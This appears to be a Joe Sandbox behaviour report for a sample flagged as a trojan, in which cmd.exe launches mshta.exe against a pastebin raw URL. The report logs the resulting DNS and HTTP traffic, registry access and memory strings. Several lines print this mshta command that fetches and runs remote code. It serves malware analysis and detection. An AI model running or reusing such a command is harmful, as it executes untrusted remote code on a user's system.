Source: Process started | Author: Joe Security: Data: Command: c:\windows\system32\mshta.EXE http:\\pastebin.com\raw\i5mSzahw, CommandLine: c:\windows\system32\mshta.EXE http:\\pastebin.com\raw\i5mSzahw, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\mshta.exe, NewProcessName: C:\Windows\SysWOW64\mshta.exe, OriginalFileName: C:\Windows\SysWOW64\mshta.exe, ParentCommandLine: cmd /C 'c:\windows\system32\mshta.EXE http:\\pastebin.com\raw\i5mSzahw', ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 6360, ProcessCommandLine: c:\windows\system32\mshta.EXE http:\\pastebin.com\raw\i5mSzahw, ProcessId: 6416 |
Source: unknown | HTTPS traffic detected: 104.23.98.190:443 -> 192.168.2.3:49707 version: TLS 1.2 |
Source: unknown | DNS query: name: pastebin.com |
Source: global traffic | HTTP traffic detected: GET /raw/i5mSzahw HTTP/1.1Accept: */*Accept-Language: en-USAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: pastebin.comConnection: Keep-Alive |
Source: Joe Sandbox View | JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19 |
Source: Joe Sandbox View | IP Address: 104.23.98.190 104.23.98.190 |
Source: Joe Sandbox View | IP Address: 104.23.98.190 104.23.98.190 |
Source: unknown | Network traffic detected: HTTP traffic on port 49707 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49707 |
Source: mshta.exe, 00000002.00000002.481657075.0000000009076000.00000002.00000001.sdmp | String found in binary or memory: http://fontfabrik.com |
Source: mshta.exe, 00000002.00000002.478902815.00000000053AC000.00000004.00000001.sdmp | String found in binary or memory: http://pastebin.com/raw/i5mSzahw |
Source: mshta.exe, 00000002.00000002.481657075.0000000009076000.00000002.00000001.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0 |
Source: mshta.exe, 00000002.00000002.481657075.0000000009076000.00000002.00000001.sdmp | String found in binary or memory: http://www.carterandcone.coml |
Source: mshta.exe, 00000002.00000002.481657075.0000000009076000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com |
Source: mshta.exe, 00000002.00000002.481657075.0000000009076000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers |
Source: mshta.exe, 00000002.00000002.481657075.0000000009076000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/? |
Source: mshta.exe, 00000002.00000002.481657075.0000000009076000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN |
Source: mshta.exe, 00000002.00000002.481657075.0000000009076000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html |
Source: mshta.exe, 00000002.00000002.481657075.0000000009076000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers8 |
Source: mshta.exe, 00000002.00000002.481657075.0000000009076000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers? |
Source: mshta.exe, 00000002.00000002.481657075.0000000009076000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designersG |
Source: mshta.exe, 00000002.00000002.481657075.0000000009076000.00000002.00000001.sdmp | String found in binary or memory: http://www.fonts.com |
Source: mshta.exe, 00000002.00000002.481657075.0000000009076000.00000002.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn |
Source: mshta.exe, 00000002.00000002.481657075.0000000009076000.00000002.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn/bThe |
Source: mshta.exe, 00000002.00000002.481657075.0000000009076000.00000002.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn/cThe |
Source: mshta.exe, 00000002.00000002.481657075.0000000009076000.00000002.00000001.sdmp | String found in binary or memory: http://www.galapagosdesign.com/DPlease |
Source: mshta.exe, 00000002.00000002.481657075.0000000009076000.00000002.00000001.sdmp | String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm |
Source: mshta.exe, 00000002.00000002.481657075.0000000009076000.00000002.00000001.sdmp | String found in binary or memory: http://www.goodfont.co.kr |
Source: mshta.exe, 00000002.00000002.481657075.0000000009076000.00000002.00000001.sdmp | String found in binary or memory: http://www.jiyu-kobo.co.jp/ |
Source: mshta.exe, 00000002.00000002.481657075.0000000009076000.00000002.00000001.sdmp | String found in binary or memory: http://www.sajatypeworks.com |
Source: mshta.exe, 00000002.00000002.481657075.0000000009076000.00000002.00000001.sdmp | String found in binary or memory: http://www.sakkal.com |
Source: mshta.exe, 00000002.00000002.481657075.0000000009076000.00000002.00000001.sdmp | String found in binary or memory: http://www.sandoll.co.kr |
Source: mshta.exe, 00000002.00000002.481657075.0000000009076000.00000002.00000001.sdmp | String found in binary or memory: http://www.tiro.com |
Source: mshta.exe, 00000002.00000002.481657075.0000000009076000.00000002.00000001.sdmp | String found in binary or memory: http://www.typography.netD |
Source: mshta.exe, 00000002.00000002.481657075.0000000009076000.00000002.00000001.sdmp | String found in binary or memory: http://www.urwpp.deDPlease |
Source: mshta.exe, 00000002.00000002.481657075.0000000009076000.00000002.00000001.sdmp | String found in binary or memory: http://www.zhongyicts.com.cn |
Source: mshta.exe, 00000002.00000002.478902815.00000000053AC000.00000004.00000001.sdmp | String found in binary or memory: https://pastebin.com/raw/i5mSzahw |
Source: unknown | DNS traffic detected: queries for: clientconfig.passport.net |
Source: global traffic | HTTP traffic detected: GET /raw/i5mSzahw HTTP/1.1Accept: */*Accept-Language: en-USAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: pastebin.comConnection: Keep-Alive |
Source: unknown | HTTPS traffic detected: 104.23.98.190:443 -> 192.168.2.3:49707 version: TLS 1.2 |
Source: C:\Windows\SysWOW64\mshta.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE | Jump to behavior |
Source: C:\Windows\SysWOW64\mshta.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers | Jump to behavior |
Source: unknown | Process created: C:\Windows\SysWOW64\cmd.exe cmd /C 'c:\windows\system32\mshta.EXE http:\\pastebin.com\raw\i5mSzahw' | |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 | |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\mshta.exe c:\windows\system32\mshta.EXE http:\\pastebin.com\raw\i5mSzahw | |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\mshta.exe c:\windows\system32\mshta.EXE http:\\pastebin.com\raw\i5mSzahw | Jump to behavior |
Source: C:\Windows\SysWOW64\mshta.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{25336920-03F9-11CF-8FD0-00AA00686F13}\InProcServer32 | Jump to behavior |
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6368:120:WilError_01 |
Source: C:\Windows\SysWOW64\mshta.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\i5mSzahw[1] | Jump to behavior |
Source: classification engine | Classification label: mal52.troj.evad.win@4/1@2/1 |
Source: C:\Windows\SysWOW64\mshta.exe | File read: C:\Windows\System32\drivers\etc\hosts | Jump to behavior |
Source: C:\Windows\SysWOW64\mshta.exe | File read: C:\Windows\System32\drivers\etc\hosts | Jump to behavior |
Source: C:\Windows\SysWOW64\mshta.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings | Jump to behavior |
Source: Window Recorder | Window detected: More than 3 window changes detected |
Source: C:\Windows\SysWOW64\mshta.exe | Code function: 2_2_06D6E215 pushfd ; retf | 2_2_06D6E21B |
Source: C:\Windows\SysWOW64\mshta.exe | Code function: 2_2_06D6F772 push 06D6F7B0h; retf | 2_2_06D6F784 |
Source: C:\Windows\SysWOW64\mshta.exe | Registry key monitored for changes: HKEY_CURRENT_USER_Classes | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\System32\conhost.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\SysWOW64\mshta.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\SysWOW64\mshta.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\SysWOW64\mshta.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\SysWOW64\mshta.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\SysWOW64\mshta.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\SysWOW64\mshta.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\SysWOW64\mshta.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\SysWOW64\mshta.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\SysWOW64\mshta.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\SysWOW64\mshta.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\SysWOW64\mshta.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\SysWOW64\mshta.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\SysWOW64\mshta.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\SysWOW64\mshta.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\SysWOW64\mshta.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\SysWOW64\mshta.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\SysWOW64\mshta.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\SysWOW64\mshta.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\mshta.exe c:\windows\system32\mshta.EXE http:\\pastebin.com\raw\i5mSzahw | Jump to behavior |
Source: mshta.exe, 00000002.00000002.478587797.0000000003F80000.00000002.00000001.sdmp | Binary or memory string: Program Manager |
Source: mshta.exe, 00000002.00000002.478587797.0000000003F80000.00000002.00000001.sdmp | Binary or memory string: Shell_TrayWnd |
Source: mshta.exe, 00000002.00000002.478587797.0000000003F80000.00000002.00000001.sdmp | Binary or memory string: Progman |
Source: mshta.exe, 00000002.00000002.478587797.0000000003F80000.00000002.00000001.sdmp | Binary or memory string: Progmanlock |
Source: C:\Windows\SysWOW64\cmd.exe | Queries volume information: C:\ VolumeInformation | Jump to behavior |
Source: C:\Windows\SysWOW64\mshta.exe | Queries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation | Jump to behavior |
Source: C:\Windows\SysWOW64\mshta.exe | Queries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation | Jump to behavior |
Source: C:\Windows\SysWOW64\mshta.exe | Queries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation | Jump to behavior |
Source: C:\Windows\SysWOW64\mshta.exe | Queries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation | Jump to behavior |
Source: C:\Windows\SysWOW64\mshta.exe | Queries volume information: C:\Windows\Fonts\times.ttf VolumeInformation | Jump to behavior |
Source: C:\Windows\SysWOW64\mshta.exe | Queries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation | Jump to behavior |
Source: C:\Windows\SysWOW64\mshta.exe | Queries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation | Jump to behavior |
Thumbnails
This section contains all screenshots as thumbnails, including those not shown in the slideshow.